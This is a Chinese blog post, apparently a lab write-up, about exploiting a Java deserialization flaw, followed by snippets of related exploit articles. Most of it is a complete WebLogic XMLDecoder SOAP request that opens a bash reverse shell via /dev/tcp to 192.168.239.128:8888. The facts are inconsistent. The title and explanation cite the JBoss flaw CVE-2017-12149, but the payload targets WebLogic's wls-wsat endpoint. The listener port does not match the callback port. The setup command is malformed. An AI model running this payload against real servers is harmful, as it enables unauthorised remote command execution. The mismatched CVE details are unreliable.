weblogic-CVE-2017-12149漏洞验证

已于 2025-03-19 09:53:19 修改
阅读量418 收藏 3
点赞数 5
文章标签: 渗透测试 网络安全 weblogic
于 2025-03-19 09:45:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75658977/article/details/146361111
版权

(1)验证漏洞:weblogic-CVE-2017-12149漏洞验证

使用nc、burp等工具,构建序列化利用请求,获得反弹shell,实现漏洞利用。

漏洞原理

CVE-2017-12149是一个存在于JBoss Application Server中的反序列化漏洞。该漏洞出现在JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中,具体位于jboss\server\all\deploy\httpha-invoker.sar\invoker.war\WEB-INF\classes\org\jboss\invocation\http\servle目录下的ReadOnlyAccessFilter.class文件中。在doFilter方法中,从HTTP请求中获取数据后,直接尝试将客户端的数据流进行反序列化,而没有进行任何安全检查或过滤,从而导致了任意代码执行的风险。

1.环境搭建

拉取镜像:dockers load -I 地址

bea_wls_internal/

2.测试准备

Win11:

nc -lvp 7001

3.漏洞验证

(1)拦截burp访问靶机请求,发送到repeat,构建请求

(2)在repeat中构建一个request如下:

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: 172.30.0.1:7001

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: text/xml

Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.4.0" class="java.beans.XMLDecoder">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/192.168.239.128/8888 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></void>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

(3)win11获得反向shell成功

可以通过shell在远程靶机执行各种命令,并获得回显 测试成功

ococ06
关注
weblogic CVE-2017-10271漏洞复现
qq_68581192的博客
05-24 1895
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell。
weblogic漏洞分析之CVE-2017-10271
洋洋的小黑屋
08-17 1641
weblogic漏洞分析之CVE-2017-10271 一、环境搭建 1)配置docker 这里使用vulhub的环境:CVE-2017-10271 编辑docker-compose.yml文件,加入8453端口 version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" - "8453:8453" 启动docker docker-compose
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149。Jboss反序列化漏洞利用工具,CVE-2017-12149
JBoss漏洞 - CVE-2017-12149
HAKUNAMATATATTA的博客
12-14 1945
JBOSSApplication Server 反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
CVE-2017-12149
qq_22002773的博客
09-08 498
CVE-2017-12149
java反序列化漏洞(CVE-2017-12149)
明哥哥知识分享
09-06 4280
一. 实验环境 软件 版本 注释 JBoss V6.0Final jboss-_CVE-2017-12149 利用工具 二. 安装实验环境 环境 版本 注释 靶机 Windows 2008 R2 IP : 10.1.1.240 攻击机 Windows 2008 R2 IP : 10.1.1.253 安装了 java 环境(不在重复) 解压压缩包,cmd 进入 \jboss-6.1.0.Final\bin 目录下 在 cmd 中执行 run.bat -b
buuctf [Jboss]CVE-2017-12149
qq_1873822的博客
04-03 549
漏洞描述 JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。 https://juejin.cn/post/6869587131678294023 漏洞影响 JBoss 5.x - 6.x 漏洞复现 https://github.com/yunxu1/jboss-_CVE-2017-12149 执行成功,打
K8 weblogic-CVE-2018-2628-getshell
07-16
【K8 weblogic-CVE-2018-2628-getshell】是一个针对Oracle WebLogic Server的渗透测试工具,主要用于检验系统是否存在CVE-2018-2628漏洞并利用该漏洞获取shell权限。这个工具的使用应该严格限制在合法的安全测试环境...
K8 weblogic-CVE-2018-2628-getshell工具
07-13
【K8 weblogic-CVE-2018-2628-getshell工具】是一款针对Oracle WebLogic服务器的渗透测试工具,主要用于检测和利用CVE-2018-2628安全漏洞获取服务器的shell控制权。这个工具集成了漏洞的详细利用过程,包括图片教程...
weblogic 漏洞统计 CVE
09-18
12. CVE-2017-10147、CVE-2017-10148、CVE-2017-10178、CVE-2017-5638等:这些漏洞可能涉及WebLogic的特定组件,需要密切关注并尽快修复,以防止潜在的攻击。 13. CVE-2017-10137、CVE-2017-10336、CVE-2017-10152...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用。
Jboss 反序列化 CVE-2017-12149
npc88888的博客
05-12 857
JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。
JBoss反序列化漏洞CVE-2017-12149
2401_82451607的博客
09-22 331
JBoss反序列化漏洞CVE-2017-12149
jboss 代码执行 (CVE-2017-12149)
最新发布
Cherish what you have!
11-28 411
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用 该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。
jboss 5.x/6.x 反序列化漏洞 cve-2017-12149
whatday的专栏
07-31 663
目录 测试环境 漏洞复现 编写反弹shell的命令 序列化数据生成 发送POC 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 参考: https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg https://access.redhat.com/securit
Jboss漏洞CVE-2017-12149
qq_68186313的博客
08-07 360
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过 滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导 致了漏洞。2、使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可。返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞。1、访问,验证是否存在漏洞
Jboss反序列化远程代码执行漏洞CVE-2017-12149
weixin_46411728的博客
08-28 1830
Jboss反序列化远程代码执行漏洞CVE-2017-12149
CVE-2017-12149(JBOSS反序列化远程代码执行漏洞漏洞复现
Jerry____的博客
12-12 4510
一:漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、环境搭建(目标机:192.168.33.144) 利用vulhub搭建环境 1、进入漏洞目录 cd /vulhub/jboss/CVE-2017-12149 2、搭...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值